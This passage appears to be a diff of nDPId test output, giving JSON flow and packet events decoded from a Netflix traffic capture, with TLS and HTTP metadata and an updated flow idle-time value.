-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los 